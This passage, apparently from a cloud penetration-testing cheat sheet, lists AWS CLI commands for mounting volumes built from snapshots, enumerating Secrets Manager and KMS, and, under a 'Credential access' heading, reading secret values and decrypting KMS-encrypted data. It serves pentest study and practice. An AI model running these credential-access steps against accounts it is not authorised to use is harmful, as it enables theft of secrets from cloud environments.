aws ec2 create-volume --snapshot-id [snapshot-id] --available-zone [available-zone]

Describe ec2 instances

aws ec2 describe-instances

Attach specified volume to the ec2-instance

aws ec2 attach-volume --volume-id [volume-id] --instance-id [instance-id] --device /dev/sdfd

Mount volume on EC2 file system

sudo mount /dev/sdfd /new_dir

See Exploit snapshot

Secret Manager

Enumeration

List all secrets that are stored by Secrets Manager

aws secretsmanager list-secrets

Describe about a specified secret

aws secretsmanager describe-secret --secret-id [secret-name]

Resource-based policy attached to the specified secret

aws secretsmanager get-resource-policy --secret-id [secret-id]

Key Management Server, KMS

All keys available in KMS

aws kms list-keys

Describe about a specified key

aws kms describe-key --key-id [key-id]

List of policies attached to specified key

aws kms list-key-policies --key-id [key-id]

Information about a policy

aws kms get-key-policy --policy-name [policy-name] --key-id [key-id]

Credential access

Secret Manager

aws secretsmanager get-secret-value --secret-id [secret-id]

KMS

Decrypt the encrypted secret by KMS key

aws kms decrypt --ciphertext-blob fileb://encrypted_file --output text --query Plaintext

Cloudtrail

Read access aver Cloudtrail logs

LogoGitHub - carlospolop/Cloudtrail2IAMGitHub

Interesting Book

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Resources

LogoPage not found - HackTricks Cloudcloud.hacktricks.xyz
LogoAWS CLI Tips and Tricks - Hacking The Cloudhackingthe.cloud
LogoAWS penetration testing: A step-by-step guideHack The Box
PreviousAzureNextRecon / Initial Access / Enum

Last updated